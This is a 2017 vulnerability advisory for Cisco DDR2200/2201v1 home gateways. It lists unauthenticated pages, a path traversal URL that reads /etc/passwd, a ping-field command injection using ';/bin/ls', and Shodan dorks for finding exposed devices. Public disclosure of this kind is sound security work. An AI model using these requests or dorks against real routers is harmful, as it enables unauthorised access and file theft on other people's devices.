seeing is believing

Cisco DDR2200 / 2201v1 Insecure Direct Object Reference / Path Traversal

Cisco DDR2200 / 2201v1 Insecure Direct Object Reference / Path Traversal
Posted Jul 14, 2017
Authored by The Gambler

Cisco DDR2200 and 2201v1 ADSL2+ Residential Gateway devices suffer from insecure direct object reference vulnerabilities that allow for remote code execution as well as a path traversal issue.

tags | exploit, remote, vulnerability, code execution, bypass, file inclusion
systems | cisco
MD5 | 3d75aff532e38b6b2a6184d2c0b2e44d

Cisco DDR2200 / 2201v1 Insecure Direct Object Reference / Path Traversal

Change Mirror Download
*Copyright and Disclaimer*

The information in this advisory is Copyright 2017 Conviso and provided so that the society can understand the risk they may be facing by running affected software, hardware or other components used on their systems. In case you wish to copy information from this advisory, you must either copy all of it or refer to this document (including our URL). No guarantee is provided for the accuracy of this information, or damage you may cause your systems in testing.

*About Conviso*

Conviso is a consulting company specialized on application security. Our values are based on the allocation of the adequate competencies on the field, a clear and direct speech with the market, collaboration and partnership with our customers and business partners and constant investments on methodology and research improvement.

This advisory has been discovered as part of a general investigation into the security of software used in the IT environments of our customers. For more information about our company and services provided, please check our website at www.conviso.com.br.

*The Security Research*

Conviso maintains a virtual team dedicated to explore our customeras environments in order to identify technical vulnerabilities in software and hardware, developing real-world mitigation solutions and processes to maintain more secure environments. This team is named Conviso Labs and also contribute to important world-class projects and organizations.
The vulnerability described in this security advisory was discovered by Matheus Bernardes on July 15th 2017 during an internal security research.

*Security Advisory*
The page used to download the configuration file is vulnerable to path traversal, that allows an attacker to download any system file.

*Issue Description*
Some of Cisco DDR2200 router series, show some vulnerabilities as, authentication bypass, Remote code execution and path traversal

As a result, an attacker can gain access to the router configuration, access to internal files and a limited command execution.

*Shodan Dork*
http.title:"Cisco DDR2201v1 ADSL2+ Residential Gateway"
http.title:"Cisco DDR2200 ADSL2+ Residential Gateway"

*Affected Components*
*Device*: Cisco DDR2201v1 ADSL2+ Residential Gateway
*Software Version*: DDR2201v1-NA-AnnexA-FCC-V00.00.03.28.3
Path TraversalA A A
Bypass Authentication
Remote code execution (RCE)

*Device*: Cisco DDR2200 ADSL2+ Residential Gateway
*Software Version*: DDR2200B-NA-AnnexA-FCC-V00.00.03.45.4E
Remote code execution (RCE)
Path TraversalA A A

*Vulnerabilities details*
Bypass Authentication
Some pages donat need the user to be authenticated to gain access
http://192.168.0.1:8080/info.html
http://192.168.0.1:8080/wancfg.cmd?action=view
http://192.168.0.1:8080/rtroutecfg.cmd?action=view
http://192.168.0.1:8080/arpview.cmd
http://192.168.0.1:8080/cpuview.cmd
http://192.168.0.1:8080/memoryview.cmd
http://192.168.0.1:8080/statswan.cmd
http://192.168.0.1:8080/statsatm.cmd
http://192.168.0.1:8080/scsrvcntr.cmd?action=view
http://192.168.0.1:8080/scacccntr.cmd?action=view
http://192.168.0.1:8080/logview.cmd
http://192.168.0.1:8080/voicesipview.cmd
http://192.168.0.1:8080/voicesipview.cmd?view=advanced
http://192.168.0.1:8080/usbview.cmd
http://192.168.0.1:8080/wlmacflt.cmd?action=view
http://192.168.0.1:8080/wlwds.cmd
http://192.168.0.1:8080/wlstationlist.cmd
http://192.168.0.1:8080/HPNAShow.cmd
http://192.168.0.1:8080/HPNAView.cmd
http://192.168.0.1:8080/qoscls.cmd?action=view
http://192.168.0.1:8080/qosqueue.cmd?action=view
http://192.168.0.1:8080/portmap.cmd
http://192.168.0.1:8080/scmacflt.cmd?action=view
http://192.168.0.1:8080/scinflt.cmd?action=view
http://192.168.0.1:8080/scoutflt.cmd?action=view
http://192.168.0.1:8080/certlocal.cmd?action=view
http://192.168.0.1:8080/certca.cmd?action=view
http://192.168.0.1:8080/waitPingqry.cgi
http://192.168.0.1:8080/PingMsg.cmd

*Path Traversal*
The page used to download the configuration file, is vulnerable to path traversal, that allow an attacker to download any system file.
http://192.168.0.1:8080/download.conf?filename=/etc/passwd

*Remote code execution (RCE)*
*Description*
The ping function allows arbitrary code execution. Just add a ; and then the full path of a binary:
http://192.168.0.1:8080/waitPingqry.cgi?showPingResult=1&pingAddr=;/bin/ls
After the previous request finish, just access the follow page to see the output
http://192.168.0.1:8080/PingMsg.cmd


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    22 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close